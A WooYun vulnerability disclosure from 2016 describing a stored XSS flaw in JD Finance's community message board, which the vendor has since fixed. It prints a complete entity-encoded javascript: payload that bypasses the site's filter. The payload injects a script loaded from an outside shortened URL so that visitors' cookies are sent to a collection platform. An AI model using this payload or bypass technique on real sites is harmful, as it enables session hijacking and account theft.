当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167176

漏洞标题:京东金融某处存储XSS跨站可提取Cookies

相关厂商:京东金融

漏洞作者: Power

提交时间:2016-01-04 14:26

修复时间:2016-01-06 09:47

公开时间:2016-01-06 09:47

漏洞类型:XSS 跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-04: 细节已通知厂商并且等待厂商处理中
2016-01-05: 厂商已经确认,细节仅向厂商公开
2016-01-06: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

没描述清楚?非自X

详细说明:

测试了下留言板处,发现存储XSS,因未过滤"<",">"及p,a,img标签,及javascript:伪协议,综合到一起形成存储型XSS 但是明文插入式不可以的,需要修改编码,服务器端规则过滤了"&#***;"这种形式的,实体编码,但是当使用"&#***"最后没有分号也可以,例如"&#0000106"浏览器也能够进行html解码,并且京东将大部分事件都过滤了,所以只能使用javascript:下面是详细过程 插入点: http://club.jr.jd.com/topic/618751&orderBy=*&pageNo=* 留言板处插入如下代码 插入的源代码是这样

<a href=javascript:document.write('<script src=***></script>')>


源代码经过编码之后是这样,这里自己写了个半自动化脚本进行编码,编码后插入语句是这样的 

</p> 111 <a href=javascript:&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000100&#0000111&#0000099&#0000117&#0000109&#0000101&#0000110&#0000116&#0000046&#0000119&#0000114&#0000105&#0000116&#0000101&#0000040&#0000039&#0000060&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000032&#0000115&#0000114&#0000099&#0000061&#0000104&#0000116&#0000116&#0000112&#0000058&#0000047&#0000047&#0000116&#0000046&#0000099&#0000110&#0000047&#0000082&#0000052&#0000073&#0000067&#0000097&#0000090&#0000066&#0000062&#0000060&#0000047&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000062&#0000039&#0000041> <p>

代码插入的地址如下
http://club.jr.jd.com/topic/619467&orderBy=1&pageNo=3
插入效果如下

2.png


但是这段代码貌似只能在IE6中触发(IE6测试成功) 平台收cookie

3.png

漏洞证明:

http://club.jr.jd.com/topic/619467&orderBy=1&pageNo=3

2.png

修复方案:

版权声明:转载请注明来源 Power@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2016-01-05 11:14

厂商回复:

此问题已内部发现,已在修复中。感谢关注京东金融安全

最新状态:

2016-01-06:已修复